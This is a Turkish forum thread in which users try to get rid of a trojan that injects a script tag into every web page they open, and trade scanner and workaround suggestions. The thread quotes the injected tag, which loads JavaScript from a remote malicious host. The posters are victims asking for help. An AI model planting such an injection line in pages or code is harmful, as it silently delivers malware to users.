Bir trojan ile başım dertte. Bütün virüs koruyucuları denedim ama hiç biri bu sorunumu çözemedi. Hepsi trojanı buluyor siliyor ama nezaman internet explorer yada firefox'u açsam bir sayfa girsem aynı uyarıları tekrar alıyor.
Sorun ziyaret etmek istediğim web sayfasının kodunun başına <SCRIPT LANGUAGE="javascript1.2" SRC="http://x.222360.com/un.js"></SCRIPT> şekilnde bir kod eklenmesi. Trojanı bulaştıranda buradaki js kodu. Virus koruyucuları bu kod için çözüm üretmiyor sadece bulaştırdığı trojanı siliyorlar ama ben ne zaman bir sayfaya girmek istesem bu kod yüzünden sayfa çok geç açılıyor. Bazen bu .js dosyasının yolu yanıt vermediği zaman uzun süre bekliyor ve zaman aşımına uğruyor; sayfayı açamıyorum.
Bu sorunun kesin bi çözümü var format bunu biliyorum ama ben bu kodun girdiğim sayfaların kodunun başına nasıl eklendiği bilmek istiyorum ve bu sorunu format atmadan nasıl çözebilirim bunu öğrenmek istiyorum.
Böyle bir sorunla karşılaşan ve çözüm bulan arkadaşlar varsa yardımcı olurlarsa sevinirim... ;)
birçok sonuç var. trojan http://x.222360.com/xx.js x ile gösterdiğim yerlere harfler uyduruyor o yüzden internetten bulman zor oluyor. Yukarıdaki aramadan hakkında bilgiye ulaşabilirsin.
TROJANIN ADI DA Win32:small-HZN [Trj]
< Bu mesaj bu kişi tarafından değiştirildi can-selcik -- 31 Aralık 2007; 11:34:35 >
_____________________________
E8400 @ 4940MHz vCore= 1.76875 NB= 1.67 PLL= 1.86 | Zalman WB-5 | Alphacool NexXxoS Xtreme II - Rev.2 (240lık) (2x Nanoxia FX12-1250) | AGB-Eheim 600 Station II 12V | Asus Maximus Formula X38 (Rampage Formula BIOS'u ile) | OCZ Titanium 2GB 1066MHz DDR2 Dual Kit | Seagate 160GB SATAII NCQ 7200RPM | WD 250GB ATA/133 HDD 7200RPM | Powercolor HD4870 (Akasa Neo Vortexx) | CM Stacker 810 | SilverStone Strider 750W PSU | ASUS DRW-1608P3S | ASUS DRW-1814BLT | Logitech G5 v2 | Logitech G15 v2 | QPAD XT-R Black (Large-4 mm) Carbytek Mousepad | Cyber Snipa Sonar 5.1 Headset
Bunu bende farkettim hatta domain değişikliği bile oluyor. Şimdi "dejaay" önerdiği "SuperAntiSpyware 3.7.1018" ile tarama yapıcam bakalım sonuç nasıl olucak teşekkürler ;)
"SuperAntiSpyware" da bir işe yaramadı. Bu virüs, bu kodu nasıl açılan sayfanın koduna ekliyor. Kullandığı yöntem nedir? ve bu sorunu yaşayan arkadaşlar var mı?
Hepsini denedim şuanda makinamda o kurulu zaten :) Virus koruyucuları bu işe çözemiyor. Yaptıkları şey .js dosyası download edilmeye başladığında trojan uyarısı veriyor ve engelliyor. Ama her ziyaret ettiğim sayfada aynı şekilde uyarı alıyorum. Buda çok rahatsız edici bişi.
Yapmam gereken o kodun oraya nasıl eklendiğini bulmak ve ona göre bi çözüm üretmek.
aynı sorun bendede var solucan die bir başlıkta bikaç cvp aldım ama söylenenler hiçbir işe yaramıyor....araştırmalara devam ediyorum...bir sonuca ulaşırsam bildiririm....
Ağdaki diğer makinelerdede bu virüs var zaten. Peki modem ile ilgili bir şey olabilir mi? Bu virüs dsl modeme yerleşebilir mi? Bu tür virüsler var mı?
bir örneğini daha önce görmedim ama bilemiyorum.Her şey mümkün, yanında dsl modemlerin de birer yazılımı var, eğer açıkları varsa böyle bir virus vakası olabilir.Şimdilik aklıma bir şey gelmiyor.Ağdaki tüm pclere format atıp bi deneseniz?Çok uçuk bir çözüm ama kesin sonuca vardırır.
dipnot: sorundan kısa yoldan kurtulmak için firefox kullanılıp script-blocker eklentisi kurulabilir.Virus sorun yaratamayacaktır.
< Bu mesaj bu kişi tarafından değiştirildi M@XWeLL -- 2 Ocak 2008; 22:17:12 >